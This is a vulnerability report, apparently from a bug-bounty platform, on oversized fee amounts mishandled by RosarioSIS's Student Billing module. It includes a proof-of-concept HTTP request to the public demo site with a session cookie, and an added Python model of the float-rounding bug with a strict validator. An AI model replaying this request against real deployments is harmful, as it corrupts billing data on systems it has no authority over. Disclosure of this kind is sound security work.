Improper handling of large integer values in francoisjacquet/rosariosis
Status: Valid
Reported on May 2nd 2022

Description
In the create Fee function, large integer values in the amount field are not handled properly.
Proof of Concept
POST /demonstration/Modules.php?modname=Student_Billing/StudentFees.php HTTP/1.1
Host: www.rosariosis.org
Cookie: RosarioSIS=kja39eaq6q73envhk6eo8300vgumn2612c5huvue08vgh66faog1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://www.rosariosis.org/demonstration/Modules.php?modname=Student_Billing/StudentFees.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 385
Origin: https://www.rosariosis.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
LO_search=&month_values[14][DUE_DATE]=&day_values[14][DUE_DATE]=&year_values[14][DUE_DATE]=&values[14][COMMENTS]=&values[new][TITLE]=ased&values[new][AMOUNT]=9999999999999999999999999&month_values[new][DUE_DATE]=&day_values[new][DUE_DATE]=&year_values[new][DUE_DATE]=&values[new][COMMENTS]=&FILE_ATTACHED=
Steps to reproduce
- Go to Student Billing
- Create a new Fee with amount 9999999999999999999999999
- We can see the server returns a larger value than 9999999999999999999999999
[PoC image]
Impact
This vulnerability can make the website not work properly.
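The following Python example is added here to illustrate the report; it is not RosarioSIS code (the project is written in PHP) and does not claim to reproduce its storage path. It models the unsafe behaviour as a coercion of the submitted field to an IEEE-754 double (an assumption about why the server echoes back a larger number), shows that the PoC value 9999999999999999999999999 comes back as 10000000000000000905969664, and puts a strict decimal validator beside it. The digit and scale limits (MAX_INTEGER_DIGITS, SCALE, like a NUMERIC(12,2) column) and the function names naive_amount and parse_amount are assumptions for this example only.

```python
from decimal import Decimal, InvalidOperation, ROUND_HALF_UP
import re

# Value taken from the report's PoC request (values[new][AMOUNT]).
POC_AMOUNT = "9999999999999999999999999"

# Assumed policy for a fee amount: at most 10 integer digits and 2 decimal
# places, as a NUMERIC(12,2) column would hold. These limits are an
# assumption for this example, not the project's actual schema.
MAX_INTEGER_DIGITS = 10
SCALE = 2
AMOUNT_RE = re.compile(r"^\d{1,%d}(\.\d{1,%d})?$" % (MAX_INTEGER_DIGITS, SCALE))


def naive_amount(raw: str) -> int:
    """Model the unsafe path (assumed): coerce the field to a binary float
    and keep the integer part. A double has a 53-bit mantissa, so 10^25 is
    rounded to the nearest representable value and the stored amount no
    longer equals what the user typed."""
    return int(float(raw))


def parse_amount(raw: str) -> Decimal:
    """Validate and parse a fee amount without ever going through float.

    Anything outside the assumed digit/scale policy (too many digits,
    signs, exponents, thousands separators) is rejected, so the oversized
    PoC value is refused before it reaches the database."""
    cleaned = raw.strip()
    if not AMOUNT_RE.fullmatch(cleaned):
        raise ValueError(f"amount {raw!r} is not a valid monetary value")
    try:
        value = Decimal(cleaned)
    except InvalidOperation as exc:  # defensive; the regex already guards this
        raise ValueError(f"amount {raw!r} could not be parsed") from exc
    # Normalise to exactly SCALE decimal places (12.5 -> 12.50).
    return value.quantize(Decimal(10) ** -SCALE, rounding=ROUND_HALF_UP)


if __name__ == "__main__":
    print("naive float path stores:", naive_amount(POC_AMOUNT))
    print("validated:", parse_amount("12.5"))
    try:
        parse_amount(POC_AMOUNT)
    except ValueError as exc:
        print("rejected:", exc)
```

The validator deliberately works on the string first: a length-bounded regex is the cheapest way to refuse a 25-digit amount, and Decimal keeps the accepted values exact, which is what a billing module needs. Whatever limits are chosen should match the column definition the value is written to, so the database never silently truncates or rounds either.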
Report timeline
- We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. (2 years ago)
- A GitHub Issue asking the maintainers to create a SECURITY.md exists. (2 years ago)
- We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back. (2 years ago)
- The researcher's credibility has increased: +7